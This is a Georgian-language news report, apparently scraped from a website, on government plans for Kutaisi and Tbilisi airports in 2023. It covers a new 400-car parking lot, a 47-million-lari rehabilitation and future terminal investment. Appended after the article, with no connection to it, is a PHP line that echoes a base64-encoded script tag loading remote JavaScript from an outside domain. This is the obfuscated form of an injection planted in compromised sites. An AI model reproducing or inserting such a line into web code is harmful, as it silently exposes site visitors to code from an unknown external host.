celsiusi
ავერსი შნაიდერი
დავით აღმაშენებლის სახელობის ქუთაისის საერთაშორისო აეროპორტში დამატებით 400 ავტომობილზე გათვლილი ახალი ავტოსადგომი აშენდება. ამის შესახებ ინფორმაციას მთავრობის პრესსამსახური ავრცელებს.
საქართველოს პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა ვიცე-პრემიერთან, ეკონომიკისა და მდგრადი განვითარების მინისტრ ლევან დავითაშვილთან და მის მოადგილეებთან სამუშაო თათბირი გამართა, სადაც 2023 წლი გეგმები მიმოიხილეეს.
მთავრობის პრესსამსახურის ცნობით, წელს ქუთაისის აეროპორტში დაგეგმილია მასშტაბური სარეაბილიტაციო სამუშაოები, რომლის მთლიანი საინვესტიციო ბიუჯეტი 47 მილიონი ლარი იქნება.
„პროექტის ფარგლებში დასრულდება 3,5 კმ-იანი ახალი ასაფრენ-დასაფრენი ზოლის პროექტირება, განხორციელდება სამიმოსვლო ბილოკებისა და ბაქანის გეგმიური რეაბილიტაცია, აშენდება დამატებით 400 ავტომობილზე გათვლილი ახალი ავტოსადგომი; განახლდება და დამონტაჟდება საერთაშორისო სტანდარტების შესაბამისი შუქსასიგნალო სისტემები“, - წერია რელიზში.
ეკონომიკისა და მდგრადი განვითარების მინისტრმა და მოადგილეებმა პრემიერ-მინისტრს მიაწოდეს ინფორმაცია თბილისის საერთაშორისო აეროპორტის განვითარების პროექტთან დაკავშირებით.
„აღინიშნა, რომ 2023 წელს დასრულდება მუშაობა თბილისის აეროპორტის გენერალური განვითარების გრძელვადიან გეგმაზე, მათ შორის, ახალი ტერმინალისა და აეროდრომის ინფრასტრუქტურის განვითარებაზე. ხაზი გაესვა ქვეყნის სწრაფი ეკონომიკური განვითარებისა და ტურიზმის მზარდი დინამიკის უზრუნველყოფისთვის თბილისისა და სხვა აეროპორტების განვითარების მნიშვნელობას და აღინიშნა, რომ თბილისის საერთაშორისო აეროპორტის განვითარებისთვის რამდენიმე ასეული მილიონი დოლარის ინვესტიცია განხორციელდება“, - წერია   პრესამსახურის მიერ გავრცელოებულ ინფორმაციაში.
 
მთავრობის გეგმის თანახმადვე, 2023 წელს დასრულდება აეროპორტების განვითარების სტრატეგიაზე მუშაობა. 
448
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");